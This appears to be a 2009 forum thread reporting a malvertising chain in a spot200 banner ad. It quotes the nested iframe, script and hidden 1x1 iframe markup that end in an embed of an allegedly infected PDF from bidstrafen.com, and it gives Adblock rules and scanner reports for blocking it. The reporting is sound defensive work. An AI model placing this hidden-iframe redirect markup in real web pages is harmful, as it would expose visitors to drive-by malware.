Comfortably Numb
RegisterFAQLogin
It is currently Mon Sep 06, 2010 10:45 pm

Board index » The Danger Zone: Links & Programs That May Harm Your PC » Virus Alert Folder

All times are UTC [ DST ]



Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 
Print view Previous topic | Next topic 
bidstrafen.com in spot200 banner 
Author Message
wagdoll
Elite Member
User avatar

Joined: Sun May 07, 2006 12:35 am
Posts: 3911
Post bidstrafen.com in spot200 banner
I just got a mini lockup and that was followed by a virus alert from AVG.

Source is inside a spot200 banner

Code:
<iframe height="90" frameborder="0" width="728" scrolling="no"
src="http://ad.spot200.com
/iframe3?XlVFAHPOCACeKCcAAAAAAOh.CwAAAAAAAgAAAAYAAAAAAP8AAAAFFNIiDQAAAAAAqio
IAAAAAABmXhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAMXwQAAAAAAAIAAwAAAAAAO99PjZduwj8730-Nl27CP7gehetRuM4.uB6F61G4zj-
amZmZmZnZP5qZmZmZmdk.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABlJ8OOM
tqVBr0.j0pn71KAy8mPkbbeYHyO7OXeAAAAAA==,,http://www.fast-ptr.com/pages
/ptp.php?refid=paul265" marginheight="0" marginwidth="0">


That loads:
Code:
<script src="http://banner.yellowlinebanner.com/banner_js?pubid=1244649&bsize=6&
rnd=0.14068207361327245&ts=1246557624622" type="text/javascript">
</script>
<div style="width: 728px; height: 90px;">


Code:
<iframe height="1" width="1" scrolling="no" style="visibility: hidden;" border="0"
src="http://t.banner0709.com/track/3388081
/S_GB?MHd0XQETBHYwam8wJ1Axbjk5YWR8BwVISVUGD281dmxnMyAkUmQlXCQkPAkbXxIFV1NEA
FUIAl0OM14DHDBQUExHWy8FZLAkMHI0CBVsSFo2XwEAZGZ4CjBwcGxVUm8TPm5kMyBQQwtVPldjf
wsMQEhdNyAwckABOFIo0DJuMzQiNT8=">


In the 1x1 iframe is this
Code:
<iframe id="id" height="4" width="1" src="/img/pfre.php" style="outline-color: -moz-use-
text-color; outline-style: none; outline-width: medium;">


Which loads this infected pdf file
Code:
<embed height="100%" width="100%" name="plugin" src="http://bidstrafen.com
/img/pfre.php" type="application/pdf"/>


Adblock:
*/img/pfre.php*
*bidstrafen.com*


Last edited by cconniejean on Sun Sep 20, 2009 2:55 am, edited 1 time in total.

adding topic title to first post
Thu Jul 02, 2009 7:14 pm
Profile
wagdoll
Elite Member
User avatar

Joined: Sun May 07, 2006 12:35 am
Posts: 3911
Post 
http://safeweb.norton.com/report/show?name=bidstrafen.com

Total threats found: 3

And this needs adding to the adblock
*/img/pfre2.php*


Last edited by cconniejean on Sun Sep 20, 2009 2:55 am, edited 2 times in total.

correcting link format
Thu Jul 02, 2009 7:19 pm
Profile
cconniejean
Elite Member
User avatar

Joined: Mon Oct 16, 2006 11:33 pm
Posts: 3583
Location: St. Augustine, Florida
Post 
Additional information:
1. http://www.virustotal.com/analisis/5a368a1ec0d79fa9db1d2a0dd48fd8be8967a6d9a81eea4714ca2bb21b18bfab-1246573185
2. http://wepawet.cs.ucsb.edu/view.php?hash=67be8db18b81c0b48af41968eb5f9722&t=1246573133&type=js


Report to Google Safe Browsing.

_________________
Friend of WOT Image TheAbbeyRose Image Image deep-c ptp Image firecracker ptp Image PTParty Image LadyoftheLinks

Last edited by cconniejean on Sun Sep 20, 2009 2:57 am, edited 3 times in total.

correcting link format
Thu Jul 02, 2009 11:25 pm
Profile WWW
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 

Board index » The Danger Zone: Links & Programs That May Harm Your PC » Virus Alert Folder

All times are UTC [ DST ]

Who is online

Users browsing this forum: No registered users and 1 guest

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Jump to:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Installed by Installatron.
Forum theme by Vjacheslav Trushkin for Free Forum/DivisionCore.